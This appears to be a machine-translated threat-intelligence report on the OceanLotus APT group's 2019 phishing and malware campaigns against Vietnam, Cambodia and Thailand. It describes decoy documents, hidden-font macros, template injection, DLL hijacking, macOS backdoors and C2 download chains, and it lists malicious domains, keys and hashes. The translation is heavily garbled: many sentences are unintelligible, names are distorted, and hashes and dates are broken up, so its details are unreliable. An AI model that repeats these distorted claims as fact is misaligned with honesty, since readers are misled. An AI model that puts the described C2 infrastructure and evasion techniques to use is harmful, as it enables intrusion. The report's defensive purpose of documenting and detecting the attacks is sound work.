Overview
OceanLotus is an APT Group with alleged Vietnamese background. The group was first revealed and named by SkyEye Team in May 2015. Its attack activities can be traced back to April 2012. The targets include China's maritime institutions, maritime construction, scientific research institutes and shipping enterprises.
In fact, according to reports of various security vendors, OceanLotus also attacked several countries, including Cambodia, Thailand, Laos, even some victims in Vietnam, like opinion leaders, media, real estate companies, foreign enterprises and banks.
RedDrip Team (formerly SkyEye Team) has been to OceanLotus to keep track of high strength, groupactivity, found it in the near future to Indochinese Peninsula countries since 2019 the latest attack activity used in the initial launch load files and attack using the technology, and combined with the QiAnXin threat intelligence data, associated with a series of attacks.
In this report, we share our summary of the latest attack techniques, attack payloads and related attacks of the OceanLotus, hoping that we can jointly improve understanding of OceanLotus group, an extremely active APT group.
Attacks on Countries
The following is a list of typical cases of attacks against some countries on Indochinese Peninsula since the end of 2018. For other unmentioned samples, please refer to the IOC list at the end of this report.
Vietnam
Bait Compression Files
On April 1, 2019, RedDrip discovered a Vietnamese file name "Hop dong sungroup.rar" in the process of daily monitoring the attack activities of the OceanLotus.
The English version is "Sun Group contract". The compressed package contains winword.exe which is renamed as “Noi dung chi tiet hop dong sungroup can chinh sua”.
In addition, we are also associated with another package decoy SUN_GROUP_CORPORATION that translates as "Sun Group Corporation". The file name in the zip package is as follows:
Noi dung can xac thuc va sua GUI den CONG TY CO PHAN TAP DOAN MAT TROI Bo Tai chinh. exe
It turned out that Sun City Group was actually one of the largest real estate developers in Vietnam.
Both samples were uploaded by Vietnam. Therefore, we speculate that the OceanLotus Group in the Sun City internal staff fishing attacks.
In addition to targeting the Vietnamese real estate industry, we also found that the group would conduct phishing attacks against the national bank of Vietnam:
The compressed package of the related samples is called cplh-nhnn-01-209.rar. The corresponding date of the samples is January 22, 2019, and the attack is most likely to occur in a similar period.
The Chinese name of the compressed package is: "national bank of Vietnam -- 01-209.rar";The winword. Exe in the package was renamed "chiphilienhoannhnn-bc209.exe", which translated as "state bank of Vietnam sbv-bc 209.exe".
SBV refers to Vietnam's central bank, the state bank of Vietnam (SBV), while BC actually refers to B2C, or third-party payment.
This attack is likely to be launched against the bank's internal staff, similar to the document transmission process disguised as a third-party payment within the bank.
In addition, there are anti-virus software related information through the disguise of fishing.
Compressed package name: "Gui lai cho MS.MAI post content kaspersky. Rar" (return MS.MAI post content kaspersky)
We also see oil as a theme for fishing:
"Tinh dau can mua" (essential oil required), the PE file in the package is called "details about purchase and purchase"
Bait Documents
The above compression package contains the Kaspersky name bait, and there is also a similar name "Content marketing kaspersky.doc" in the bait document. After opening the document, it will be shown as follows, enabling the macro attack method for the Vietnamese version of the induced click.
In addition, we also found a large number of OceanLotus disguised as a resume attack fishing activities, we internally named it OceanCV activity, and this activity will directly OceanLotus commonly used three macro attack means all exposure.
First of all, we analyze the sample names. It can be seen that the sample names all start with CV and have the characteristics of naming. There are three main types:
1, CV- name (e.g., cv-nguyenquynhchi.docx)
2. CV- name - position (e.g. CV-AnthonyWei- customerservice. docx)
3. CV- random number + English (e.g. Cv-103237-ewqdsd.doc)
It is worth noting that some samples will show the identity indicating the need to enable macro after opening:
However, when you pull down the progress bar, you will find resumes written in Vietnamese, which is true for most of the samples in the series of activities, and the resumes are inconsistent.
And these sample phishing resumes use different methods.Some use the OceanLotus MSO macro (RedDrip internally named MSOMacro)
Some use template injection techniques:
Some use the technique of converting macro code to a 1-pound font hidden in a document (later upgraded to a white 1-pound font, internally named OHNMacro for RedDrip).
In the following sections we will examine each of these three macro usage analyses in detail.
According to this batch of resume samples, we conducted homologous sample correlation for these three macro documents, combined with various dimensions, and finally found a large number of exclusive malicious macro samples of OceanLotus. Please refer to the relevant section of Office samples for details.
Exploit Vulnerabilities of Eternal Blue
We also found that OceanLotus used the "Eternal blue" series of vulnerabilities to target companies in Vietnam that provided software to the government.
Website: https://www.tandan.com.vn/portal/home/default.aspx
TAN DAN JSC for Vietnam's software company.
The company will provide the government with mail servers, official gazette database systems, citizenship management systems and more.
After the attack is successful, it will distribute Trojan horses. In the report "suspected" of "OceanLotus" organization's early attack activities against domestic colleges and universities "compiled by us last year, the Trojan horses used eternal blue to attack colleges and universities are consistent.
https://ti.qianxin.com/blog/articles/oceanlotus-targets-chinese-university/
Phishing Attacks by Exploiting WinRAR Vulnerability
In addition to traditional malicious payloads that take advantage of black and white mechanisms, malicious payloads that infiltrate tweets and websites, OceanLotus also takes advantage of the latest Winrar vulnerability to launch attacks against Vietnam.Here is one of the cases we captured:
The package name is "tut_photoshop_scan_bank_id.rar"
From the sample trigger vulnerability extract file, its name is called CocCocUpated. Exe
COCCOC is a Vietnam was founded in 2013 as a new technology company, provides online Internet search engine services and browsers, the main language used in Vietnamese and English, the search service is Vietnam's most mature, browser is based on Google Chromium development, support Windows, iOS platform.
Through analysis, we found that it was the early Trojan framework of OceanLotus, and we also put it in the section of sample analysis for separate analysis.
Bait, of course, in addition to the above, we also found that the OceanLotus will use compressed package embedded MP4 way exploit, compressed package name translated roughly "Cho exclusive blockbuster movie" Ray hospital, including Cho Ray refers to ho chi minh city, Vietnam water wok hospital (ChợRẫy), ho chi minh city, Vietnam's largest general hospital.
The package contains two MP4 files, one of which is identical to the package name, and a video translated as "the team began staffing after the exclusive stroke press release.
Similarly, released for coccocupdate.exe
And its distribute means is the way that USES network dish to undertake putting however.
This new Trojan horse will be analyzed in detail in the section of sample analysis.
MAC Backdoor
In addition to targeting Vietnam on the Windows platform, OceanLotus also attacks Vietnamese users on the MacOS platform. The following samples are typical of recent launches, which use such means as browser update, Flash installation update package, font installation package, disguised as a document to actually attack the installer.
Interestingly, when we were analyzing the samples disguised as Firefox, it would show the interface of installing Firefox after opening. Double-click the icon of Firefox, and the Trojan horse would be executed:
When you click on the update, even if you are disconnected from the Internet, the download progress bar will appear.
This is the fake interface the attacker drew:
Similarly, in the following chapters, this batch of MacOS samples targeted at Vietnam were extended for analysis.
Cambodia
Here is this year's latest attack on Cambodia by OceanLotus, called "report-no.0162(02 Pages).doc."
The sample operation process is shown in the following figure:
The samples associated by homology are as follows:
| MD5 | Filename | Create time |
| 56b5a96b8582b32ad50d6b6d9e980ce7 | Request Comment on UYFC.doc | 2019-03-18 04:12:00 |
| 3fd2a37c3b8d9eb587c71ceb8e3bb085 | No.039714(cdri).doc | 2019-03-25 04:33:00 |
The associated sample for the Cambodia attack Request Comment on uyfc.doc.
The UYFC is actually a Cambodian youth federation, the | UYFC ngo, which attacks people who might be associated with the conference.
Document screenshot:
No.039714(cdri).doc
It is clear that the attack on Cambodia also used OHN macros.
In addition to scanning documents, last year hilina also Scanned Cambodia using MacOS samples. Related sample: "Scanned Investment report-july 2018.zip"
Thailand
The typical examples of attacks by OceanLotus against Thailand since 2019 are as follows
| MD5 | Filename | Create time |
| 4c30e792218d5526f6499d235448bdd9 | Form_Provisional Agenda of the ASEAN Senior Officials Preparatory Meeting.doc | 2019-01-21 02:25:00 |
| d8a5a375da7798be781cf3ea689ae7ab | Program Retreat.doc | 2019-01-14 03:50:00 |
It is named Form_Provisional Agenda of the ASEAN Senior Officials Preparatory Meeting.
Actually, the meeting was successfully held in Thailand on April 6, 2019. From the creation time and upload time of the document (2019-03-22), it can be seen that OceanLotus has a strong ability to obtain current affairs and a long preparatory cycle.
The second document, Program Retreat, may target the military, but the broader meaning of the name does not make the attacker's heart sink.
Besides, the document contents of the two files in the above table are the same. The following is the screenshot after restoring the shellcode font in the document:
It also USES OHN macros.
Sample Analysis
MSO Macro Documents
The "MSO macro" of OceanLotus has commonality. We analyzed one sample, and it can be seen that the extracted macro code is as follows:
First it adds the Data through the Data variable, and then after base64 decryption, decrypts the VBS code, releases it into the msohtml.log, and copies wscript. Exe into Windows \SysWOW64\msohtml.exe:
Execute the msohtml.log script by copying msohtml.exe (that is, wcript.exe), as shown in the figure below:
And create scheduled tasks:
The contents of the msohtml.log script are as follows. It will execute the data in the cs array after xor 518:
The decrypted script, as shown in the figure, will execute the malicious code after the elements in the cs array xor 415:
After decryption of malicious code as shown in figure: will be downloaded from https://open.betaoffice.net/cvfemale.png code and execution.
OHN Macro Documents
Extract the macro code from the sample, open the word document, it will prompt to enable the macro, after enabling the macro will execute this function:
Then it will copy its office document to temp and name it random, as shown in the figure:
Then modify the security of the registry macro:
Take the data in the last five paragraphs of the total number of paragraphs (5 paragraphs in total, 2 blank lines, 3 with hex data), convert it from hex to bin, add it to the macro code of the new file, and then set the x_N0th1ngH3r3 method to execute the macro code after 1 second:
The format file is 1 pound text, which cannot be seen by the naked eye, as shown in the figure:
The first paragraph clears the data after formatting:
After the data is converted into bin, it will be converted into the second macro code, and the first macro code will execute the x_N0th1ngH3r3 function, as shown in the figure:
Execute the macro code of penultimate paragraph 3 in the same way, as shown in the figure:
It also starts with this function:
Take the data of the penultimate paragraph, as shown in the figure:
The data are as follows:
Then write to memory for execution:
After the data hex is converted into bin, shellcode which is mostly used by OceanLotus is shown as follows:
Configuration file:
This is the way that shellcode is loaded with three macros, mostly to combat shellcode static killing.
Template Injection Documents
The template injection class document of OceanLotus has universality, after the document starts, it will load XXX.XXX/XXX. PNG
And do the following.
To give an example of one of these attacks, fdsw.png is an office compound document:
(d497bd06b34a046841bb63d3bf20e605)
If SysWOW64\cmd.exe file exists, the system is either 32-bit or 64-bit.
Depending on the system, the file is taken out of the cell, base64 decoded, and dropped to: %appdata% main_background-png:
The hijacked csids are "{2dea658f-54c1-4227-af9b-260ab5fc3543}".
According to this CSID, it is the CSID of the DLL that is hijacked: %SystemRoot%\System32\ playsndsrv.dll
This DLL is used to play sound.
The extraction content of base64 content in the cell is as follows:
Base64 decodes one of the 32-bit PE, Dllmain will apply 0x34aca byte memory space, and then write the shellcode at 0x10012760 into memory, and execute it through the thread:
Shellcode goes to the pointer at offset 0xfc8 when the parameter is passed to the function of sub_160018:
The address offset 0xfc8 holds the command line argument and a PE:
The function of sub_160018 is mainly to load the following PE in memory, and then pass the command line to execute according to the command line parameters. The figure below is the code of receiving the command line parameters for the PE:
Request the URL, the downloaded data, after DES decryption, in memory load up.
Find more samples through association analysis:
Sort by compile time as follows:
According to the table comparison, the command line of the first sample is different from other samples. It can be known that it should be the sample of different attacks. This sample is the annotated version, which will load shellcode in memory in the same way.
The PE included in the file is found in a hacker's toolkit. The file name is CMD [w7][x64].
The function of this sample is to execute the McOds. Exe (this is the exe file name of the white utility program used by OceanLotus) through the CMD [w7][x64]. Exe contained in the file, while the McOds. Exe should be the file released by the dropper before.
The upload place of this sample is VN, the upload time is July 31, and the file name is msvchr.exe, we can know that this sample should be aimed at Vietnam attack:
Through the analysis and comparison of these samples, we can know that these samples should be used to specifically execute exe file in memory, and pass command line parameters of the Loader program, is the last six months to use the new malicious code framework, specifically used to develop against static kill.
It is found that two samples are 10M, and the end is filled with 0x20 (space), which is filled into a large file to avoid being uploaded:
And the way shellcode is loaded for these samples is a little different:
1. Most samples are executed shellcode by creating threads
2, compile the earliest version of the sample, in the form of services, with comments, in serviceMain create thread execution shellcode
3. A small part of samples execute shellcode directly on the main thread
wwlib DLL Injection
Through the analysis of the compression package cplh-nhnn-01-2019. Rar downloaded by amazon AWS, it is found that the compression package packages winword.
They use winword. Exe white use technology, winword. Exe will load the same directory by default wwlib. DLL;
The reason why winword. Exe white use technology, because winword. Exe icon is the icon of word, and wwlib.dll is hidden, so they only need to change winword.
Wwlib. DLL malicious code in the FMain export function, winword. Exe will open the default call FMain this export function, malicious code will be executed;Then base64 decodes the shellcode that comes with it and executes it in the main thread:
Location of base64-encoded shellcode in the sample:
It is found that the decoded shellcode and the previous shellcode are loaded in the same way. The data offset 0x6b6 is passed to the sub_16 function as the parameter:
The function sub_16 is used to decrypt the data following 0x6b6, decrypt the second shellcode and execute it. The figure below is the second shellcode decrypted:
The second shellcode shellcode by DES declassified out the third layer, the key to "asfahdiuqhu93ye7891h9ubioufcf" :
The third layer of shellcode in front of the entrance and two shellcode entry is the same, also call/pop way find shellcode the positions of the loaded into memory, and then take the code at the back of the data (0 x8c6 offset) when the parameters are passed to the sub_16 function, parameters passed as: HTTPS: / / office.allsafebrowsing.com/AwPT:
The shellcode from HTTPS: / / office.allsafebrowsing.com/AwPT download files, and then performed in the memory, the image below to download the file using the UA:
The downloaded AwPT file from cobaltstrike is the shellcode module:
The following figure shows the algorithm to decrypt the attached data at the end. Like the shellcode module from cobaltstrike, the difference from before is that the shift moves 8 bytes backward:
The decrypted data is a beacon module, as shown in the figure:
Extract the configuration file information as follows:
MAC Backdoor
The analysis object is a MAC backdoor disguised as a browser.
The extracted file structure is as follows, which is a macOS installation package, as shown in the figure:
After opening it, the interface for installing Firefox will be displayed. Double-click the Firefox icon, and the Dropper process will be executed:
It will pop up the interface of fake FireFox and click update. Even if the Internet is disconnected, the download progress bar will appear, which is forged by the attacker:
This is the fake interface the attacker drew:
After running, Dropper will create the following APP in the Library directory to start up:
/ Users/username/Library/LaunchAgents/com, apple. Spell. Agent. The plist
The app in the startup directory to the directory: / Users/username/Library/Spelling/spellagentd file, the file in OSX bin file, code did add case processing, will decrypt the shellcode in memory and execute, as shown in figure:
After execution back to the address: rio.imbandaad.com, through a Post request packets sent to the server: http://rio.imbandaad.com/v3/yQ/r/eiCu1gd6Qme.js
But the address is no longer valid. The signature information of the App is as follows:
CocCocUpdate
CocCocUpdate is a Dropper that is released into the startup directory using a compression package constructed by cve-2018-20250 vulnerability. The screenshot of the compression package is as follows:
After restart, it will be executed by the system, and the corresponding file is coccocupdate.exe. We have exposed a Dropper version of random key passing through command line parameters in 2015. This coccocupdate.exe is improved to pass random key through environment variables.
The specific steps are as follows:
- Gets the full path of the executed coccocupdate.exe in an environment variable with a value of "C091A8C8" for later reading.
- Randomly generate a 128-byte key and store it in an environment variable with a value of "DB99050C";Used to encrypt the shellcode data that follows them.
- Encrypt the data at 0x40E000 by random key, and write the modified PE file to Temp directory, and then execute it through CreateProcess:
The following figure shows the comparison between the original file and the encrypted file. It can be seen that there is no change in the code segment, except that the array of global variables 0xd000 is encrypted by the random key.
- If the file is bundled, it will decrypt and release a bundled file (the key is in the last 64 bytes) from a resource of resource type 10 and resource number 1, such as a Word document or a normal file, and then execute it through ShellExectue. The file does not use the decoy file to release the bundled file, so the ID is wrong:
5. The executed temp process will first determine whether there are environment variables of "C091A8C8" set, if any
If it is encrypted by the original Dropper, it will read the randomly generated 128-bit key from the "DB99050C" environment variable, decrypt the code at 0x40e000, and then decrypt one more layer and decompress one more layer, because the code has one layer of encryption and compression in the original Dropper:
Extract:
6. The decrypted file is a PE file, which will be executed in memory after decryption, as shown in the figure:
This code will release 3 files to c:\program files\ Microsoft \ Windows \system restore\ directory:
Then create the service and point to the rstrui.exe file:
Rstrui. Exe is an attacker to write a loader, disguised Microsoft Windows System Restore icon:
Mainly responsible for loading {9fbaa883-1709-4de3-8c1b-48683f740a5f} in the same directory through rundll32.
File name {9fbaa883-1709-4de3-8c1b-48683f740a5f}. Clsid file when a DllLoader, PE information is as follows:
The function of this DLL is mainly to decrypt and load shellcode with the same directory name as {9fbaa883-1709-4de3-8c1b-48683f740a5f}, as shown in the figure:
Enter the sub_10001480 function, the contents of the file will be decrypted, and the PE will be loaded in memory:
The PE after decryption in memory is shown in the figure below:
DllMain creates a thread to execute the export function Version. In the Version function, the remote control function will be executed all the time. If it fails, the sleep 6s will continue.
Then a number less than 4 will be randomly generated, and C2 will be randomly selected, as shown in the figure:
One of the functions to decrypt C2 is as follows:
The 4 domain names are as follows:
images.ucange.com
preload.ointalt.com
maintenance.allidayser.com
report.cottallid.com
The hash of the sample associated with the domain name is as follows:
2 ea902abe453b70cf77e402cc16eb552
cc7b9ee1b026e16a9d37e3988a714479
e60c35dd36c9f525007955e6b3a88b82
Binding files in this homologous sample:
Cc7b9ee1b026e16a9d37e3988a714479 bundled office files content is as follows:
Translation:
2 ea902abe453b70cf77e402cc16eb552 bundled Office files content is as follows:
Translation:
The flow chart of the Dropper is as follows:
A comparison between this version of Dropper and the 2015 version of Dropper:
1. The Dropper in 2015 is to pass the randomly generated decryption key through the command line parameter, while the Dropper in this version is to pass the key through the environment variables between the process chains (API is SetEnvironmentVariableW and GetEnvironmentVariableW).
2, the presence of the 2015 version of the detection virtual machine, this version does not exist in the detection virtual machine.
The following figure is: Dropper version of OceanLotus in 2015 passes the key through "-- ping" :
The following figure is: in this Dropper version, the randomly generated key is stored in the environment variable:
Correlation Analysis
Trojan Samples
Through the analysis of the general backdoor of OceanLotus, a large number of homologous samples were found through the features in its code:
| MD5 | Compile time | The file size | Module name |
| ac5f18f1c20901472d4708bd06a2d191 | In the 2018-06-13 s, 11:33:33 | 93184 | DllHijack. DLL |
| 221e9962c9e7da3646619ccc47338ee8 | In the 2018-06-25 s, 02:35:46 | 93184 | DllHijack. DLL |
| 26ea45578e05040deb0cc46ea3103184 | In the 2018-07-02 s, 02:11:55 | 142336 | DllHijack. DLL |
| 200033d043c13b88d121f2c1d8d2dfdf | In the 2018-07-09 s, 03:00:10 | 2053632 | DllHijack. DLL |
| 9972111cc944d20c9b315fd56eb3a177 | In the 2018-07-13 s, 03:48:03 | 142336 | DllHijack. DLL |
| bf040c081ad1b051fdf3e8ba458d3a9c | In the 2018-07-23 s, 03:11:16 | 93184 | DllHijack. DLL |
| 6c2a8612c6511df2876bdb124c33d3e1 | In the 2018-07-23 s, 04:50:51 | 93184 | DllHijack. DLL |
| 7dace8f91a35766e9c66dd6258552b02 | In the 2018-07-23 s, 12:59:23 | 142336 | DllHijack. DLL |
| c9093362a83b0e7672a161fd9ef9498a | In the 2018-08-07 s, 03:12:39 | 92672 | DllHijack. DLL |
| 38f9655c72474b6c97dc9db9b3609677 | In the 2018-08-09 s, 10:11:58 | 93184 | DllHijack. DLL |
| 4bb4d19b42e74bd11459c9358c1a6f01 | In the 2018-08-13 s, 02:21:13 | 168960 | DllHijack. DLL |
| f42611ac0ea2c66d9f27ae14706c1b00 | In the 2018-08-13 s, 08:46:56 | 92672 | DllHijack. DLL |
| c28abdfe45590af0ef5c4e7a96d4b979 | In the 2018-08-15 s, 03:20:08 | 92672 | DllHijack. DLL |
| cf0b74fe79156694a2e3ea81e3bb1f85 | In the 2018-08-20 s, 02:12:34 | 92672 | DllHijack. DLL |
| c78fd680494b505525d706c285d5ebce | In the 2018-08-20 s, 02:23:12 | 92672 | DllHijack. DLL |
| 77390c852addc3581d14acf06991982e | In the 2018-08-29 s, 03:20:46 | 168960 | DllHijack. DLL |
| 49e969a9312ee2ae639002716276073f | In the 2018-08-29 s, 03:50:11 | 93184 | DllHijack. DLL |
| f5ad93917cd5b119f82b52a0d62f4a93 | In the 2018-08-30 s, 08:22:15 | 129536 | DllHijack. DLL |
| 6291eabf6a8c58cad6a04879b7ba229f | In the 2018-09-04 s, 02:24:06 | 92672 | DllHijack. DLL |
| 9a10292157ac3748212fb77769873f6c | In the 2018-09-04 s, 02:42:21 | 129536 | DllHijack. DLL |
| a406626173132c8bd6fe52672deacbe7 | In the 2018-09-06 s, 02:03:30 | 92672 | DllHijack. DLL |
| 93c3d6cffdcb0a2f29844ff130a920be | In the 2018-09-06 s, 08:01:41 | 129536 | DllHijack. DLL |
| 6b8fc8c9fe4f4ef90b2fcbcc0d24cfc9 | In the 2018-09-10 s, 02:44:30 | 119296 | DllHijack. DLL |
| 1211dea7b68129d48513662e546c6e21 | In the 2018-09-11 s, 03:06:50 | 92672 | DllHijack. DLL |
| 2f1f8142d479a1daf3cbd404c7c22f9f | In the 2018-09-17 s, 04:12:57 | 111616 | DllHijack. DLL |
| 0f877ad5464fcbb12e1c019adf7065cc | In the 2018-09-18 s, 02:24:47 | 92672 | DllHijack. DLL |
| cab262b84dbd319f3df84f221e5c451f | In the 2018-09-18 s, 03:00:51 | 111616 | DllHijack. DLL |
| 07ff4f943b202f4e16c227679d9b598a | In the 2018-09-19 s, 02:01:04 | 92672 | DllHijack. DLL |
| 7a6ba3e26c86f3366f544f4553c9d00a | In the 2018-09-24 s, 07:12:34 | 93184 | DllHijack. DLL |
| 518f52aabd9a059d181bfe864097091e | In the 2018-09-25 s, 02:59:04 | 111616 | DllHijack. DLL |
| 70a64ae401c0a5f091b5382dea2432df | In the 2018-10-03 s, 04:17:51 | 111616 | DllHijack. DLL |
| d40b4277e0d417e2e0cff47458ddd62d | In the 2018-10-09 s, 03:22:19 | 95232 | DllHijack. DLL |
| 5f1bc795aa784f781d91acc97bec6644 | In the 2018-10-17 s, 08:02:50 | 209412 | DllHijack. DLL |
| 305d992821740a9cbbda9b3a2b50a67c | In the 2018-10-22 s, 03:27:24 | 92672 | DllHijack. DLL |
| 7df61bc3a146fcf56fe1bbd3c26ea8c0 | In the 2018-10-22 s, 03:34:11 | 113664 | DllHijack. DLL |
| 3c04352c5230b8cbaa12f262dc01d335 | In the 2018-11-14 s, 07:07:53 | 92672 | DllHijack. DLL |
| 41f717eda9bc37de6ea584597f60521f | In the 2018-11-15 s, 02:03:44 | 92672 | DllHijack. DLL |
| db81a7e405822be63634001ec0503620 | In the 2018-11-28 s, 08:55:24 | 112128 | DllHijack. DLL |
| 865a7e3cd87b5bc5feec9d61313f2944 | In the 2018-11-29 s, 02:21:27 | 92672 | DllHijack. DLL |
| aad445e7ffc5ce463996e5db13350c5b | In the 2018-11-29 s, 08:18:42 | 115712 | DllHijack. DLL |
| 9bcd0b2590c53e4c0ed5614b127c6ba7 | In the 2018-11-29 s, 09:25:15 | 112128 | DllHijack. DLL |
| 7338852de96796d7f733123f04dd1ae9 | In the 2018-12-04 s, 02:27:26 | 92672 | DllHijack. DLL |
| 906a6898d099eb50c570a4014c1760f5 | In the 2018-12-04 s, 04:31:45 | 115712 | DllHijack. DLL |
| a530410bca453c93b65d0de465c428e4 | In the 2018-12-06 s, 03:21:22 | 115712 | DllHijack. DLL |
| de409b2fe935ca61066908a92e80be29 | In the 2018-12-10 s, 04:03:20 | 115712 | DllHijack. DLL |
| 2756b2f6ba5bcf811c8baced5e98b79f | In the 2018-12-10 s, 04:29:12 | 92672 | DllHijack. DLL |
MAC Backdoor
In the previous chapter, we found that the resolved IP of C2:rio.imbandaad.com was 198.15.119.125.When we checked the IP again, we found that one of the domain names, web.dalalepredaa.com, had been labeled as OceanLotus
And through this domain name, we discovered a OceanLotus's newest MAC sample.
To disguised as a document, first of all, the sample will be in the folder name in docx d, lowercase Roman numeral five hundred instead, to deceive users: Don khieu nai. ⅾ ocx
Windows looks like this:
On the Macosx system is the office icon of the docx file, is actually a directory:
Because iconFile in info.plist points to the iconFile of a doc, as shown below:
The following is the signature information of the sample, as shown in the figure:
After the sample is executed, three directories will be created in the Library directory:
LaunchAgents
Media
Video
Install an application named LaunchAgents to start up:
The application points to the mediaagentd program in the Video directory:
At the same time, the previous directory was replaced by a real docx file, to achieve a diversion:
The released mediaagentd program is shelled and will be loaded and executed in memory after decryption:
The unshelled MACOS file is as follows:
At the entrance of the file, there will be a while loop, which will collect computer information and send it, enter the loop function of remote control, sleep for a random period of time, and continue the repeated process:
Many of the internal strings are encrypted. The following is where the encryption function is used:
The decryption method is mainly through CCCrypt, and the algorithm is aes, iv is 0, as shown in the figure:
AES encryption key (HEX) : 4 e620abedafb4d9866cc9d9c2d29e2d7ea18adf1 32-bit zero padding enough:
The decrypted data is as follows:
And the information collected is encrypted by AES and sent through the CURL library:
The message distribution function of remote control is as follows: different operations will be performed according to its own token in the first place. The following is the operation of listing the directory:
The key used for data transmission is different from the key used for decryption string. The following is the encryption key for data transmission:
07e74ff2ce9688c8f79b91ab32c95d11c140d3ac
And some string decryption algorithms use base64 decryption first, then aes decrypt:
But the base64 used in the decryption is not the standard base64. The following figure shows the base64 table of the malicious code:
he encrypted data is sent to C2, as shown in the figure below:
C2: web.dalalepredaa.com
It is worth noting that some of the recent Mac samples of hibiscus were found to have signatures. After deduplication, we found two commonly used ones:
Melinda Cline (P74QRJXB2F)
DAVID DOWELL (B5YH6VDVRE)
Office Documents
Through correlation analysis, it is found that the macro document sample and a large number of samples have the same origin.
As can be seen from the comparison case below, the content of the document was created at the same time and by the same author.
The following figure is the template feature, template file name is very OceanLotus characteristics.
After analysis, we found that we summarized the author names commonly used in the attack documents of OceanLotus, among which the largest attack activities were "DEV" activity and "Tushar" activity.
After correlation analysis of various dimensions, the document name and Hash value involved in this series of malicious macro file launching activities can be obtained.
The document name
| The document name | MD5 |
| Test. The doc | 5 c9ef8b5263651a08ea1b79057a5ee28 |
| Scan_Mau_Ao_Thun. Doc | b858c08cf7807e462ca335233bd83fe7 |
| The Content marketing Kaspersky. Doc | c313f8a5fd8ca391fc85193bc879ab02 |
| Doc. Doc | 473 fdfefa92725099ca87e992edbc92c |
| LY_ANH_TRUNG_CV. Doc | 02 cec2f17a7910b6fa994f340bbbc297 |
| LY ANH TRUNG CV. Doc | dd5ae0c0a7e17d101f570812fec4e5e4 |
| LY_ANH_TRUNG_CV. Doc | 90 e5ff68bf06cb930ed8c040139c4650 |
| LY_ANH_TRUNG_CV. Doc | 6 db450c4c756071ecafff425d6183d7d |
| CV - DucNguyenMinh. Doc | cb39e2138af92c32e53c97c0aa590d48 |
| CV, Nguyen Minh Duc. Docx | 8 e13895504e643cd8e0e87377b25bd6b |
| Danh sach can bo vi pham.doc | d3c27f779d615a1d3a35dff5e9561eb0 |
| Danh Sach Nhan Vien Bien Thu Tien Cong Ty. Docx | 27425360 d18feea54860420006ea9833 |
| Danh Sach Nhan Vien Bien Thu Tien Cong Ty. Docx | cf0142da12509f544a59093495c3a6dd |
| CV - AnthonyWei - the CustomerService. Docx | b1df440e5dd64ffae9f7e792993f2f4c |
| 878 fa022bd5e5caf678fe8d728ce42ee | |
| f78be074f6bc67a712e751254df5f166 | |
| Ho Chi Minh. Docx | e2aed850c18449a43886fc79b342132f |
| DS - Card - ChienThang - TraVinh docx | 74 b456adf2ae708789fb2d34ecccb954 |
| HopDong - XXX - TP - 092018. Docx | 72263750 df84e24fe645206a51772c88 |
| BBLV_ASC_DG_092018. Docx | 3 a574c28beca4f3c94d30e3cf3979f4c |
| Indo. Docx | ee836e0f7a40571523bf56dba59898f6 |
| Danh sach cac nha đ ắ t ấ u tranh b ị b 2.9. Doc | f6068b672a19ce14981df011a55081e4 |
| 1 | 00ac0d7337290b74bdd7f43ec4a67ddb |
After analyzing the bait names of these samples, each has its own characteristics
1, the name has political characteristics: arrested activists list
Include resume trolls
Can be linked to an email analyzed by @vupt_bka security researcher using the OceanLotus resume phishing.
https://twitter.com/vupt_bka/status/1083653486963638275
3. There are some documents showing the startup of the induction macro, which are inconsistent with the previous induction interface.
In addition, historical samples are also different from the latest sample technology. As shown below, some historical samples do not use template injection technology, but use direct macro code execution method, and the code to be executed is shown in the document content, namely the OHN macro code mentioned in the section of sample analysis.
After correlation analysis of the macro samples mentioned above, it can be found that the earliest such attack was in 2017. The bait document uploaded by Vietnam was a test sample with a high probability from the file name.
SAMPLES 08 _11__12_2017 (317).
c4d35f3263fef4a533e7403682a034c3
4, the highest frequency of the Vietnamese file protection bait series
Compression Files
In the process of analyzing a Thu moi 209.rar sample of OceanLotus, we found that the generation time of the sample was suspected to be a custom suspect
As seen from the upload time of the sample, the upload time to VT is March 1, 2019, and the time difference in the compressed package is too large.
Therefore, after correlation capture of this time, we found multiple correlation samples of OceanLotus.
| The file name | MD5 |
| 60982849 - c8e4-4039-8 f59 - dfb78d8bab0d | |
| 15 f5adf1-8798-49 bf - a6c3d90b69e b666-4 | bcbc1bef20d2befdd290e31269e0174a |
| 4052 d2e7 - cd4 ca42-4-8841-52 f782bba411 | dfaa343552e8d470096a0a09a018930f |
| Ffea6446 - e47 ab7a - 4 - b7ff - e461f9775177 | 9 b1ce9df321ce88ade4ff3b0ada5d414 |
| 5 d47e097 - c3bc - 401 - e - 8 c0f - e877280b368a | da14eece6191551a31d37d1e96681cd1 |
| Thu moi 2019. Rar | 76289f02a0b31143d87d5e35839fb24a |
Therefore, it can be further confirmed that the OceanLotus group will customize the sample generation time, and batch generation of samples for delivery.
Conclusion
This report covers a large number of attacks on Indochinese Peninsula countries and the resources used by the OceanLotus Group, revealing its endless history of attacks, extremely wide range of targets and very creative technical means. In attacks, the group was always changing baits, payloads, AV evasion techniques, even domain names assets are constantly evolving, reflects a very strong ability to fight and attack will.
Therefore, when we are tracking the attack activities of OceanLotus against China, we extend our understanding of the TTP of this notorious group. This process will never end.
IOCs
| Domain names: |
| syn.servebbs.com |
| word.webhop.info |
| beta.officopedia.com |
| outlook.updateoffices.net |
| outlook.betamedias.com |
| outlook.officebetas.com |
| office.allsafebrowsing.com |
| open.betaoffice.net |
| cortanazone.com |
| b.cortanazone.com |
| cortanasyn.com |
| api.blogdns.com |
| dominikmagoffin.com |
| blog.artinhauvin.com |
| worker.baraeme.com |
| kingsoftcdn.com |
| style.fontstaticloader.com |
| plan.evillese.com |
| bluesky2018man.com |
| enum.arkoorr.com |
| background.ristians.com |
| pong.dynathome.net |
| zone.servehttp.com |
| cdn.eworldship-news.com |
| api.blogdns.com |
| online.stienollmache.xyz |
| image.fontstaticloader.com |
| mappingpotentials.com |
| vnbizcom.com |
| cdn3.onlinesurveygorilla.com |
| eworldship-news.com |
| enormousamuses.com |
| 163mailservice.com |
| stackbio.com |
| mailserviceactivation.com |
| web.dalalepredaa.com |
| rio.imbandaad.com |
| p12.alerentice.com |
| Bait files |
| fd128b9f0cbdc374227cf5564371aacc |
| 4a0144c7436e3ff67cf2d935d82d1743 |
| 4c30e792218d5526f6499d235448bdd9 |
| d8a5a375da7798be781cf3ea689ae7ab |
| 2d3fb8d5b4cefc9660d98e0ad46ff91a |
| 89e3f31c6261f4725b891c8fd29049c9 |
| 7b0e819bd8304773c3648ab03c9f182a |
| c4d35f3263fef4a533e7403682a034c3 |
| b1df440e5dd64ffae9f7e792993f2f4c |
